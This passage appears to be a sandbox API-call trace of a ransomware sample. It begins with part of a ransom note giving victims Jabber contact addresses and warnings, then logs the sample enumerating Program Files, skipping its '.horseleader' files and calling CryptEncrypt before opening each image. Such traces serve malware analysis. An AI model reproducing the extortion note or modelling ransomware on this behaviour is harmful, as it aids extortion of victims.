us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0251.735] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.736] lstrlenA (lpString="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") returned 1368 [0251.736] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.736] CloseHandle (hObject=0x158) returned 1 [0251.736] GetProcessHeap () returned 0x780000 [0251.736] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.736] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f38039d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa89306e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f3f2aea, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Rectangles", cAlternateFileName="RECTAN~1")) returned 1 [0251.736] lstrcmpiW (lpString1="Rectangles", lpString2="Windows") returned -1 [0251.736] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles") returned 58 [0251.736] lstrcmpW (lpString1="Rectangles", lpString2=".") returned 1 [0251.736] lstrcmpW (lpString1="Rectangles", lpString2="..") returned 1 [0251.736] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.736] GetProcessHeap () returned 0x780000 [0251.737] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.737] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\*") returned 60 [0251.737] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f38039d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa89306e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f3f2aea, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.739] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.739] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\.") returned 60 [0251.739] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.739] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f38039d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa89306e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f3f2aea, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.739] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.739] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\..") returned 61 [0251.739] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.739] lstrcmpW (lpString1="..", 
lpString2="..") returned 0 [0251.739] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f955d49, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f955d49, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0251.739] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0251.739] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576black.png") returned 76 [0251.739] StrStrIW (lpFirst="1047x576black.png", lpSrch=".horseleader") returned 0x0 [0251.739] lstrcmpW (lpString1="1047x576black.png", lpString2="#Decrypt#.txt") returned 1 [0251.739] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0251.739] lstrlenW (lpString=".testttjffg") returned 11 [0251.740] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576black.png", lpSrch=".testttjffg") returned 0x0 [0251.740] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.740] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.740] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xffffffff [0251.740] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f9c8160, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f9c8160, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1928, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="1047x576_91n92.png", cAlternateFileName="")) returned 1 [0251.740] lstrcmpiW (lpString1="1047x576_91n92.png", lpString2="Windows") returned -1 [0251.740] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576_91n92.png") returned 77 [0251.740] StrStrIW (lpFirst="1047x576_91n92.png", lpSrch=".horseleader") returned 0x0 [0251.740] lstrcmpW (lpString1="1047x576_91n92.png", lpString2="#Decrypt#.txt") returned 1 [0251.740] lstrcmpW (lpString1="1047x576_91n92.png", lpString2="_uninstalling_.png") returned 1 [0251.740] lstrlenW (lpString=".testttjffg") returned 11 [0251.740] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576_91n92.png", lpSrch=".testttjffg") returned 0x0 [0251.740] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.740] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.741] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576_91n92.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\1047x576_91n92.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.741] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f9ee2bd, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f9ee2bd, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eee5249, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb05, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="15x15dot.png", cAlternateFileName="")) returned 1 [0251.741] lstrcmpiW (lpString1="15x15dot.png", lpString2="Windows") returned -1 [0251.741] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\15x15dot.png") returned 71 [0251.741] StrStrIW (lpFirst="15x15dot.png", lpSrch=".horseleader") returned 0x0 [0251.741] lstrcmpW (lpString1="15x15dot.png", lpString2="#Decrypt#.txt") returned 1 [0251.741] lstrcmpW (lpString1="15x15dot.png", lpString2="_uninstalling_.png") returned 1 [0251.741] lstrlenW (lpString=".testttjffg") returned 11 [0251.741] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\15x15dot.png", lpSrch=".testttjffg") returned 0x0 [0251.741] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.741] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.741] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\15x15dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 
returned 0xffffffff [0251.742] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f9a2003, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f9a2003, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ef0b3a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x15f4, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="720x480icongraphic.png", cAlternateFileName="")) returned 1 [0251.742] lstrcmpiW (lpString1="720x480icongraphic.png", lpString2="Windows") returned -1 [0251.742] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\720x480icongraphic.png") returned 81 [0251.742] StrStrIW (lpFirst="720x480icongraphic.png", lpSrch=".horseleader") returned 0x0 [0251.742] lstrcmpW (lpString1="720x480icongraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.742] lstrcmpW (lpString1="720x480icongraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.742] lstrlenW (lpString=".testttjffg") returned 11 [0251.742] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\720x480icongraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.742] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.742] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.742] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\720x480icongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\720x480icongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.742] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa86831, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fa86831, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ef0b3a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.742] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.742] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_ButtonGraphic.png") returned 91 [0251.743] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.743] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.743] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.743] lstrlenW (lpString=".testttjffg") returned 11 [0251.743] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.743] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.743] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.743] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd 
maker\\shared\\dvdstyles\\rectangles\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.743] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa3a577, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fa3a577, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ef0b3a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.743] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.743] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_SelectionSubpicture.png") returned 97 [0251.743] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.743] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.743] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.743] lstrlenW (lpString=".testttjffg") returned 11 [0251.743] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.743] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.744] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 
[0251.744] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.744] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa606d4, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fa606d4, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ef0b3a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.744] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.744] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_ButtonGraphic.png") returned 92 [0251.744] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.744] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.744] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.744] lstrlenW (lpString=".testttjffg") returned 11 [0251.744] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.744] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.744] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, 
Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.744] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.745] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa1441a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fa1441a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ef0b3a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.745] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.745] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_SelectionSubpicture.png") returned 98 [0251.745] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.745] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.745] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.745] lstrlenW (lpString=".testttjffg") returned 11 [0251.745] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_SelectionSubpicture.png", lpSrch=".testttjffg") 
returned 0x0 [0251.745] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.745] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.745] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.745] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f9ee2bd, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f9ee2bd, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ef0b3a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.745] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.745] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_ButtonGraphic.png") returned 89 [0251.746] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.746] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.746] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.746] lstrlenW (lpString=".testttjffg") returned 11 [0251.746] StrStrW 
(lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.746] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.746] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.746] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.746] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa3a577, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fa3a577, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ef0b3a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.746] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.746] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_SelectionSubpicture.png") returned 95 [0251.746] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.746] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.746] lstrcmpW 
